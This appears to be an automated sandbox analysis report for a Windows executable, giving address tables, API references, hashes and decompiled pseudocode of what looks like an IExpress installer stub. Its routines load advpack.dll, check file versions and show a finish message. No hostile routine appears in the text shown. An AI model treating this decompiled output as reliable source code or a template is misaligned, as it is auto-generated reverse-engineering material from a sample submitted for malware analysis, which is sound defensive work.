                                                                                                                                                                                                                                                0x000239da
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x000239dc
                                                                                                                                                                                                                                                0x000239b6
                                                                                                                                                                                                                                                0x00023955
                                                                                                                                                                                                                                                0x0002395b
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00023961
                                                                                                                                                                                                                                                0x00023963
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00023969
                                                                                                                                                                                                                                                0x00023969
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00023969
                                                                                                                                                                                                                                                0x00023915
                                                                                                                                                                                                                                                0x00023915
                                                                                                                                                                                                                                                0x0002391b
                                                                                                                                                                                                                                                0x0002391f
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x0002392d
                                                                                                                                                                                                                                                0x00023933
                                                                                                                                                                                                                                                0x00023938
                                                                                                                                                                                                                                                0x0002393a
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00023940
                                                                                                                                                                                                                                                0x00023946
                                                                                                                                                                                                                                                0x0002394b
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x0002394b
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x000238f2
                                                                                                                                                                                                                                                0x00023843
                                                                                                                                                                                                                                                0x00023845
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x0002384b
                                                                                                                                                                                                                                                0x0002384d
                                                                                                                                                                                                                                                0x00023883
                                                                                                                                                                                                                                                0x00023885
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x0002389a
                                                                                                                                                                                                                                                0x0002389e
                                                                                                                                                                                                                                                0x0002389e
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x000238a0
                                                                                                                                                                                                                                                0x000238a0
                                                                                                                                                                                                                                                0x000238a2
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x000238a4
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x000238a4
                                                                                                                                                                                                                                                0x0002384f
                                                                                                                                                                                                                                                0x00023851
                                                                                                                                                                                                                                                0x00023857
                                                                                                                                                                                                                                                0x0002386e
                                                                                                                                                                                                                                                0x00023877
                                                                                                                                                                                                                                                0x0002387b
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00023881
                                                                                                                                                                                                                                                0x00023859
                                                                                                                                                                                                                                                0x0002385c
                                                                                                                                                                                                                                                0x00023862
                                                                                                                                                                                                                                                0x00023866
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00023868
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x000238f4

                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • GetVersionExA.KERNEL32(?,00000000,?,?), ref: 00023723
                                                                                                                                                                                                                                                • MessageBeep.USER32(00000000), ref: 000239C3
                                                                                                                                                                                                                                                • MessageBoxA.USER32(00000000,00000000,lenta,00000030), ref: 000239F1
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000001.00000002.387924667.0000000000021000.00000020.00000001.01000000.00000004.sdmp, Offset: 00020000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000001.00000002.387915086.0000000000020000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                                • Associated: 00000001.00000002.387940375.0000000000028000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                                • Associated: 00000001.00000002.387959099.000000000002A000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                                • Associated: 00000001.00000002.387959099.000000000002C000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_20000_gck46uD.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: Message$BeepVersion
                                                                                                                                                                                                                                                • String ID: 3$lenta
                                                                                                                                                                                                                                                • API String ID: 2519184315-4216304122
                                                                                                                                                                                                                                                • Opcode ID: 239837d1c14ed7dbfbbd046da2983fe2cef5989786438febbfb8fda600c0f676
                                                                                                                                                                                                                                                • Instruction ID: ddfaa17dee176cb719cc8917aedcf3ec7604dffae7b666d51912e94547743dd9
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 239837d1c14ed7dbfbbd046da2983fe2cef5989786438febbfb8fda600c0f676
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 1691E371A012349BEBB48B14EC817EAB7F5AB46304F1541A9D8899B291DB788F81CF42
                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                C-Code - Quality: 83%
                                                                                                                                                                                                                                                			E00026495(void* __ebx, void* __ecx, void* __esi, void* __eflags) {
                                                                                                                                                                                                                                                				signed int _v8;
                                                                                                                                                                                                                                                				char _v268;
                                                                                                                                                                                                                                                				void* __edi;
                                                                                                                                                                                                                                                				signed int _t9;
                                                                                                                                                                                                                                                				signed char _t14;
                                                                                                                                                                                                                                                				struct HINSTANCE__* _t15;
                                                                                                                                                                                                                                                				void* _t18;
                                                                                                                                                                                                                                                				CHAR* _t26;
                                                                                                                                                                                                                                                				void* _t27;
                                                                                                                                                                                                                                                				signed int _t28;
                                                                                                                                                                                                                                                
                                                                                                                                                                                                                                                				_t27 = __esi;
                                                                                                                                                                                                                                                				_t18 = __ebx;
                                                                                                                                                                                                                                                				_t9 =  *0x28004; // 0xf4950d3e
                                                                                                                                                                                                                                                				_v8 = _t9 ^ _t28;
                                                                                                                                                                                                                                                				_push(__ecx);
                                                                                                                                                                                                                                                				E00021781( &_v268, 0x104, __ecx, "C:\Users\hardz\AppData\Local\Temp\IXP001.TMP\");
                                                                                                                                                                                                                                                				_t26 = "advpack.dll";
                                                                                                                                                                                                                                                				E0002658A( &_v268, 0x104, _t26);
                                                                                                                                                                                                                                                				_t14 = GetFileAttributesA( &_v268);
                                                                                                                                                                                                                                                				if(_t14 == 0xffffffff || (_t14 & 0x00000010) != 0) {
                                                                                                                                                                                                                                                					_t15 = LoadLibraryA(_t26);
                                                                                                                                                                                                                                                				} else {
                                                                                                                                                                                                                                                					_t15 = LoadLibraryExA( &_v268, 0, 8);
                                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                                				return E00026CE0(_t15, _t18, _v8 ^ _t28, 0x104, _t26, _t27);
                                                                                                                                                                                                                                                			}














                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • GetFileAttributesA.KERNEL32(?,advpack.dll,?,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,?,00000000), ref: 000264DF
                                                                                                                                                                                                                                                • LoadLibraryExA.KERNEL32(?,00000000,00000008,?,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,?,00000000), ref: 000264F9
                                                                                                                                                                                                                                                • LoadLibraryA.KERNEL32(advpack.dll,?,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,?,00000000), ref: 00026502
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000001.00000002.387924667.0000000000021000.00000020.00000001.01000000.00000004.sdmp, Offset: 00020000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000001.00000002.387915086.0000000000020000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                                • Associated: 00000001.00000002.387940375.0000000000028000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                                • Associated: 00000001.00000002.387959099.000000000002A000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                                • Associated: 00000001.00000002.387959099.000000000002C000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_20000_gck46uD.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: LibraryLoad$AttributesFile
                                                                                                                                                                                                                                                • String ID: C:\Users\user\AppData\Local\Temp\IXP001.TMP\$advpack.dll
                                                                                                                                                                                                                                                • API String ID: 438848745-3761280616
                                                                                                                                                                                                                                                • Opcode ID: 0491dbdd95ecb1c1297a948e8c29a5d52adb8f3a9a0d5c64480595e054fddb22
                                                                                                                                                                                                                                                • Instruction ID: 509b481d00494f70cbc66c1b513da5124a1880addb5ea8e90810f506f8bace40
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 0491dbdd95ecb1c1297a948e8c29a5d52adb8f3a9a0d5c64480595e054fddb22
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: DB01D6306041289BE760DB64EC89FEE7378DB65310F600195F585921C0DF75AE86CA51
                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                C-Code - Quality: 100%
                                                                                                                                                                                                                                                			E000228E8(intOrPtr __ecx, char* __edx, intOrPtr* _a8) {
                                                                                                                                                                                                                                                				void* _v8;
                                                                                                                                                                                                                                                				char* _v12;
                                                                                                                                                                                                                                                				intOrPtr _v16;
                                                                                                                                                                                                                                                				void* _v20;
                                                                                                                                                                                                                                                				intOrPtr _v24;
                                                                                                                                                                                                                                                				int _v28;
                                                                                                                                                                                                                                                				int _v32;
                                                                                                                                                                                                                                                				void* _v36;
                                                                                                                                                                                                                                                				int _v40;
                                                                                                                                                                                                                                                				void* _v44;
                                                                                                                                                                                                                                                				intOrPtr _v48;
                                                                                                                                                                                                                                                				intOrPtr _v52;
                                                                                                                                                                                                                                                				intOrPtr _v56;
                                                                                                                                                                                                                                                				intOrPtr _v60;
                                                                                                                                                                                                                                                				intOrPtr _v64;
                                                                                                                                                                                                                                                				long _t68;
                                                                                                                                                                                                                                                				void* _t70;
                                                                                                                                                                                                                                                				void* _t73;
                                                                                                                                                                                                                                                				void* _t79;
                                                                                                                                                                                                                                                				void* _t83;
                                                                                                                                                                                                                                                				void* _t87;
                                                                                                                                                                                                                                                				void* _t88;
                                                                                                                                                                                                                                                				intOrPtr _t93;
                                                                                                                                                                                                                                                				intOrPtr _t97;
                                                                                                                                                                                                                                                				intOrPtr _t99;
                                                                                                                                                                                                                                                				int _t101;
                                                                                                                                                                                                                                                				void* _t103;
                                                                                                                                                                                                                                                				void* _t106;
                                                                                                                                                                                                                                                				void* _t109;
                                                                                                                                                                                                                                                				void* _t110;
                                                                                                                                                                                                                                                
                                                                                                                                                                                                                                                				_v12 = __edx;
                                                                                                                                                                                                                                                				_t99 = __ecx;
                                                                                                                                                                                                                                                				_t106 = 0;
                                                                                                                                                                                                                                                				_v16 = __ecx;
                                                                                                                                                                                                                                                				_t87 = 0;
                                                                                                                                                                                                                                                				_t103 = 0;
                                                                                                                                                                                                                                                				_v20 = 0;
                                                                                                                                                                                                                                                				if( *((intOrPtr*)(__ecx + 0x7c)) <= 0) {
                                                                                                                                                                                                                                                					L19:
                                                                                                                                                                                                                                                					_t106 = 1;
                                                                                                                                                                                                                                                				} else {
                                                                                                                                                                                                                                                					_t62 = 0;
                                                                                                                                                                                                                                                					_v8 = 0;
                                                                                                                                                                                                                                                					while(1) {
                                                                                                                                                                                                                                                						_v24 =  *((intOrPtr*)(_t99 + 0x80));
                                                                                                                                                                                                                                                						if(E00022773(_v12,  *((intOrPtr*)(_t62 + _t99 +  *((intOrPtr*)(_t99 + 0x80)) + 0xbc)) + _t99 + 0x84) == 0) {
                                                                                                                                                                                                                                                							goto L20;
                                                                                                                                                                                                                                                						}
                                                                                                                                                                                                                                                						_t68 = GetFileVersionInfoSizeA(_v12,  &_v32);
                                                                                                                                                                                                                                                						_v28 = _t68;
                                                                                                                                                                                                                                                						if(_t68 == 0) {
                                                                                                                                                                                                                                                							_t99 = _v16;
                                                                                                                                                                                                                                                							_t70 = _v8 + _t99;
                                                                                                                                                                                                                                                							_t93 = _v24;
                                                                                                                                                                                                                                                							_t87 = _v20;
                                                                                                                                                                                                                                                							if( *((intOrPtr*)(_t70 + _t93 + 0x84)) == _t106 &&  *((intOrPtr*)(_t70 + _t93 + 0x88)) == _t106) {
                                                                                                                                                                                                                                                								goto L18;
                                                                                                                                                                                                                                                							}
                                                                                                                                                                                                                                                						} else {
                                                                                                                                                                                                                                                							_t103 = GlobalAlloc(0x42, _t68);
                                                                                                                                                                                                                                                							if(_t103 != 0) {
                                                                                                                                                                                                                                                								_t73 = GlobalLock(_t103);
                                                                                                                                                                                                                                                								_v36 = _t73;
                                                                                                                                                                                                                                                								if(_t73 != 0) {
                                                                                                                                                                                                                                                									if(GetFileVersionInfoA(_v12, _v32, _v28, _t73) == 0 || VerQueryValueA(_v36, "\\",  &_v44,  &_v40) == 0 || _v40 == 0) {
                                                                                                                                                                                                                                                										L15:
                                                                                                                                                                                                                                                										GlobalUnlock(_t103);
                                                                                                                                                                                                                                                										_t99 = _v16;
                                                                                                                                                                                                                                                										L18:
                                                                                                                                                                                                                                                										_t87 = _t87 + 1;
                                                                                                                                                                                                                                                										_t62 = _v8 + 0x3c;
                                                                                                                                                                                                                                                										_v20 = _t87;
                                                                                                                                                                                                                                                										_v8 = _v8 + 0x3c;
                                                                                                                                                                                                                                                										if(_t87 <  *((intOrPtr*)(_t99 + 0x7c))) {
                                                                                                                                                                                                                                                											continue;
                                                                                                                                                                                                                                                										} else {
                                                                                                                                                                                                                                                											goto L19;
                                                                                                                                                                                                                                                										}
                                                                                                                                                                                                                                                									} else {
                                                                                                                                                                                                                                                										_t79 = _v44;
                                                                                                                                                                                                                                                										_t88 = _t106;
                                                                                                                                                                                                                                                										_v28 =  *((intOrPtr*)(_t79 + 0xc));
                                                                                                                                                                                                                                                										_t101 = _v28;
                                                                                                                                                                                                                                                										_v48 =  *((intOrPtr*)(_t79 + 8));
                                                                                                                                                                                                                                                										_t83 = _v8 + _v16 + _v24 + 0x94;
                                                                                                                                                                                                                                                										_t97 = _v48;
                                                                                                                                                                                                                                                										_v36 = _t83;
                                                                                                                                                                                                                                                										_t109 = _t83;
                                                                                                                                                                                                                                                										do {
                                                                                                                                                                                                                                                											 *((intOrPtr*)(_t110 + _t88 - 0x34)) = E00022A89(_t97, _t101,  *((intOrPtr*)(_t109 - 0x10)),  *((intOrPtr*)(_t109 - 0xc)));
                                                                                                                                                                                                                                                											 *((intOrPtr*)(_t110 + _t88 - 0x3c)) = E00022A89(_t97, _t101,  *((intOrPtr*)(_t109 - 4)),  *_t109);
                                                                                                                                                                                                                                                											_t109 = _t109 + 0x18;
                                                                                                                                                                                                                                                											_t88 = _t88 + 4;
                                                                                                                                                                                                                                                										} while (_t88 < 8);
                                                                                                                                                                                                                                                										_t87 = _v20;
                                                                                                                                                                                                                                                										_t106 = 0;
                                                                                                                                                                                                                                                										if(_v56 < 0 || _v64 > 0) {
                                                                                                                                                                                                                                                											if(_v52 < _t106 || _v60 > _t106) {
                                                                                                                                                                                                                                                												GlobalUnlock(_t103);
                                                                                                                                                                                                                                                											} else {
                                                                                                                                                                                                                                                												goto L15;
                                                                                                                                                                                                                                                											}
                                                                                                                                                                                                                                                										} else {
                                                                                                                                                                                                                                                											goto L15;
                                                                                                                                                                                                                                                										}
                                                                                                                                                                                                                                                									}
                                                                                                                                                                                                                                                								}
                                                                                                                                                                                                                                                							}
                                                                                                                                                                                                                                                						}
                                                                                                                                                                                                                                                						goto L20;
                                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                                				L20:
                                                                                                                                                                                                                                                				 *_a8 = _t87;
                                                                                                                                                                                                                                                				if(_t103 != 0) {
                                                                                                                                                                                                                                                					GlobalFree(_t103);
                                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                                				return _t106;
                                                                                                                                                                                                                                                			}


































                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • GlobalFree.KERNEL32 ref: 00022A6F
                                                                                                                                                                                                                                                  • Part of subcall function 00022773: CharUpperA.USER32(F4950D3E,00000000,00000000,00000000), ref: 000227A8
                                                                                                                                                                                                                                                  • Part of subcall function 00022773: CharNextA.USER32(0000054D), ref: 000227B5
                                                                                                                                                                                                                                                  • Part of subcall function 00022773: CharNextA.USER32(00000000), ref: 000227BC
                                                                                                                                                                                                                                                  • Part of subcall function 00022773: RegOpenKeyExA.ADVAPI32(80000002,?,00000000,00020019,?,?,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 00022829
                                                                                                                                                                                                                                                  • Part of subcall function 00022773: RegQueryValueExA.ADVAPI32(?,00021140,00000000,?,-00000005,?,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 00022852
                                                                                                                                                                                                                                                  • Part of subcall function 00022773: ExpandEnvironmentStringsA.KERNEL32(-00000005,?,00000104,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 00022870
                                                                                                                                                                                                                                                  • Part of subcall function 00022773: RegCloseKey.ADVAPI32(?,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 000228A0
                                                                                                                                                                                                                                                • GlobalAlloc.KERNEL32(00000042,00000000,?,?,?,?,?,?,?,?,00023938,?,?,?,?,-00000005), ref: 00022958
                                                                                                                                                                                                                                                • GlobalLock.KERNEL32 ref: 00022969
                                                                                                                                                                                                                                                • GlobalUnlock.KERNEL32(00000000,?,?,?,?,?,?,?,?,00023938,?,?,?,?,-00000005,?), ref: 00022A21
                                                                                                                                                                                                                                                • GlobalUnlock.KERNEL32(00000000,?,?,?,?), ref: 00022A81
Memory Dump Source
• Source File: 00000001.00000002.387924667.0000000000021000.00000020.00000001.01000000.00000004.sdmp, Offset: 00020000, based on PE: true
• Associated: 00000001.00000002.387915086.0000000000020000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.387940375.0000000000028000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.387959099.000000000002A000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.387959099.000000000002C000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_20000_gck46uD.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: Global$Char$NextUnlock$AllocCloseEnvironmentExpandFreeLockOpenQueryStringsUpperValue
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 3949799724-0
                                                                                                                                                                                                                                                • Opcode ID: 952d0815a557059c7cf947da2a89bdc67af792d7f6623af8818949b28ab75629
                                                                                                                                                                                                                                                • Instruction ID: b385c5ba7f08713369741a9a491cf122006cf54212aaa116c9d72299ae99d1e2
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 952d0815a557059c7cf947da2a89bdc67af792d7f6623af8818949b28ab75629
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: CC510C31E00229EFDB21DFD8E885AAEFBB9FF48700F14416AE915E3211DB359941DB91
                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                C-Code - Quality: 32%
                                                                                                                                                                                                                                                			E00024169(void* __eflags) {
                                                                                                                                                                                                                                                				int _t18;
                                                                                                                                                                                                                                                				void* _t21;
                                                                                                                                                                                                                                                
                                                                                                                                                                                                                                                				_t20 = E0002468F("FINISHMSG", 0, 0);
                                                                                                                                                                                                                                                				_t21 = LocalAlloc(0x40, 4 + _t3 * 4);
                                                                                                                                                                                                                                                				if(_t21 != 0) {
                                                                                                                                                                                                                                                					if(E0002468F("FINISHMSG", _t21, _t20) != 0) {
                                                                                                                                                                                                                                                						if(lstrcmpA(_t21, "<None>") == 0) {
                                                                                                                                                                                                                                                							L7:
                                                                                                                                                                                                                                                							return LocalFree(_t21);
                                                                                                                                                                                                                                                						}
                                                                                                                                                                                                                                                						_push(0);
                                                                                                                                                                                                                                                						_push(0x40);
                                                                                                                                                                                                                                                						_push(0);
                                                                                                                                                                                                                                                						_push(_t21);
                                                                                                                                                                                                                                                						_t18 = 0x3e9;
                                                                                                                                                                                                                                                						L6:
                                                                                                                                                                                                                                                						E000244B9(0, _t18);
                                                                                                                                                                                                                                                						goto L7;
                                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                                					_push(0);
                                                                                                                                                                                                                                                					_push(0x10);
                                                                                                                                                                                                                                                					_push(0);
                                                                                                                                                                                                                                                					_push(0);
                                                                                                                                                                                                                                                					_t18 = 0x4b1;
                                                                                                                                                                                                                                                					goto L6;
                                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                                				return E000244B9(0, 0x4b5, 0, 0, 0x10, 0);
                                                                                                                                                                                                                                                			}






                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                  • Part of subcall function 0002468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 000246A0
                                                                                                                                                                                                                                                  • Part of subcall function 0002468F: SizeofResource.KERNEL32(00000000,00000000,?,00022D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 000246A9
                                                                                                                                                                                                                                                  • Part of subcall function 0002468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 000246C3
                                                                                                                                                                                                                                                  • Part of subcall function 0002468F: LoadResource.KERNEL32(00000000,00000000,?,00022D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 000246CC
                                                                                                                                                                                                                                                  • Part of subcall function 0002468F: LockResource.KERNEL32(00000000,?,00022D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 000246D3
                                                                                                                                                                                                                                                  • Part of subcall function 0002468F: memcpy_s.MSVCRT ref: 000246E5
                                                                                                                                                                                                                                                  • Part of subcall function 0002468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 000246EF
                                                                                                                                                                                                                                                • LocalAlloc.KERNEL32(00000040,?,00000000,00000000,00000105,00000000,000230B4), ref: 00024189
                                                                                                                                                                                                                                                • LocalFree.KERNEL32(00000000,?,00000000,00000000,00000105,00000000,000230B4), ref: 000241E7
                                                                                                                                                                                                                                                  • Part of subcall function 000244B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00024518
                                                                                                                                                                                                                                                  • Part of subcall function 000244B9: MessageBoxA.USER32(?,?,lenta,00010010), ref: 00024554
                                                                                                                                                                                                                                                Strings
Memory Dump Source
• Source File: 00000001.00000002.387924667.0000000000021000.00000020.00000001.01000000.00000004.sdmp, Offset: 00020000, based on PE: true
• Associated: 00000001.00000002.387915086.0000000000020000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.387940375.0000000000028000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.387959099.000000000002A000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.387959099.000000000002C000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_20000_gck46uD.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: Resource$FindFreeLoadLocal$AllocLockMessageSizeofStringmemcpy_s
                                                                                                                                                                                                                                                • String ID: <None>$FINISHMSG
                                                                                                                                                                                                                                                • API String ID: 3507850446-3091758298
                                                                                                                                                                                                                                                • Opcode ID: 6e24c87e31700a1725ef4aa6172e8acabab60d24c607c634eb5aeb08d52bf523
                                                                                                                                                                                                                                                • Instruction ID: 613aa657e4b4f98414d978b96a0c2d7ee560c0cfcf3bf8ba6e24ddf50c6af803
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 6e24c87e31700a1725ef4aa6172e8acabab60d24c607c634eb5aeb08d52bf523
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 8801D1B17002347FF3342665AC86FBB218EDBD5795F104026BB06E11819E6CCC1141B6
                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                C-Code - Quality: 100%
                                                                                                                                                                                                                                                			E00027155() {
                                                                                                                                                                                                                                                				void* _v8;
                                                                                                                                                                                                                                                				struct _FILETIME _v16;
                                                                                                                                                                                                                                                				signed int _v20;
                                                                                                                                                                                                                                                				union _LARGE_INTEGER _v24;
                                                                                                                                                                                                                                                				signed int _t23;
                                                                                                                                                                                                                                                				signed int _t36;
                                                                                                                                                                                                                                                				signed int _t37;
                                                                                                                                                                                                                                                				signed int _t39;
                                                                                                                                                                                                                                                
                                                                                                                                                                                                                                                				_v16.dwLowDateTime = _v16.dwLowDateTime & 0x00000000;
                                                                                                                                                                                                                                                				_v16.dwHighDateTime = _v16.dwHighDateTime & 0x00000000;
                                                                                                                                                                                                                                                				_t23 =  *0x28004; // 0xf4950d3e
                                                                                                                                                                                                                                                				if(_t23 == 0xbb40e64e || (0xffff0000 & _t23) == 0) {
                                                                                                                                                                                                                                                					GetSystemTimeAsFileTime( &_v16);
                                                                                                                                                                                                                                                					_v8 = _v16.dwHighDateTime ^ _v16.dwLowDateTime;
                                                                                                                                                                                                                                                					_v8 = _v8 ^ GetCurrentProcessId();
                                                                                                                                                                                                                                                					_v8 = _v8 ^ GetCurrentThreadId();
                                                                                                                                                                                                                                                					_v8 = GetTickCount() ^ _v8 ^  &_v8;
                                                                                                                                                                                                                                                					QueryPerformanceCounter( &_v24);
                                                                                                                                                                                                                                                					_t36 = _v20 ^ _v24.LowPart ^ _v8;
                                                                                                                                                                                                                                                					_t39 = _t36;
                                                                                                                                                                                                                                                					if(_t36 == 0xbb40e64e || ( *0x28004 & 0xffff0000) == 0) {
                                                                                                                                                                                                                                                						_t36 = 0xbb40e64f;
                                                                                                                                                                                                                                                						_t39 = 0xbb40e64f;
                                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                                					 *0x28004 = _t39;
                                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                                				_t37 =  !_t36;
                                                                                                                                                                                                                                                				 *0x28008 = _t37;
                                                                                                                                                                                                                                                				return _t37;
                                                                                                                                                                                                                                                			}












                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • GetSystemTimeAsFileTime.KERNEL32(00000000), ref: 00027182
                                                                                                                                                                                                                                                • GetCurrentProcessId.KERNEL32 ref: 00027191
                                                                                                                                                                                                                                                • GetCurrentThreadId.KERNEL32 ref: 0002719A
                                                                                                                                                                                                                                                • GetTickCount.KERNEL32 ref: 000271A3
                                                                                                                                                                                                                                                • QueryPerformanceCounter.KERNEL32(?), ref: 000271B8
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000001.00000002.387924667.0000000000021000.00000020.00000001.01000000.00000004.sdmp, Offset: 00020000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000001.00000002.387915086.0000000000020000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                                • Associated: 00000001.00000002.387940375.0000000000028000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                                • Associated: 00000001.00000002.387959099.000000000002A000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                                • Associated: 00000001.00000002.387959099.000000000002C000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_20000_gck46uD.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: CurrentTime$CountCounterFilePerformanceProcessQuerySystemThreadTick
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 1445889803-0
                                                                                                                                                                                                                                                • Opcode ID: a0c7f4617daaa75257457d6452a15ccecd0cd0aba2c6721d22f8121642e781b2
                                                                                                                                                                                                                                                • Instruction ID: 40ae0367ff6d12209bb196e581325649cd83621ab071ad84f628857ae28b6dd2
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: a0c7f4617daaa75257457d6452a15ccecd0cd0aba2c6721d22f8121642e781b2
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: A1115E75E01218DFDB60DFB8EA48A9EB7F4FF08320F618855D805E7210EB389A158B41
                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                C-Code - Quality: 93%
                                                                                                                                                                                                                                                			E000219E0(void* __ebx, void* __edi, struct HWND__* _a4, intOrPtr _a8, int _a12, int _a16) {
                                                                                                                                                                                                                                                				signed int _v8;
                                                                                                                                                                                                                                                				char _v520;
                                                                                                                                                                                                                                                				void* __esi;
                                                                                                                                                                                                                                                				signed int _t11;
                                                                                                                                                                                                                                                				void* _t14;
                                                                                                                                                                                                                                                				void* _t23;
                                                                                                                                                                                                                                                				void* _t27;
                                                                                                                                                                                                                                                				void* _t33;
                                                                                                                                                                                                                                                				struct HWND__* _t34;
                                                                                                                                                                                                                                                				signed int _t35;
                                                                                                                                                                                                                                                
                                                                                                                                                                                                                                                				_t33 = __edi;
                                                                                                                                                                                                                                                				_t27 = __ebx;
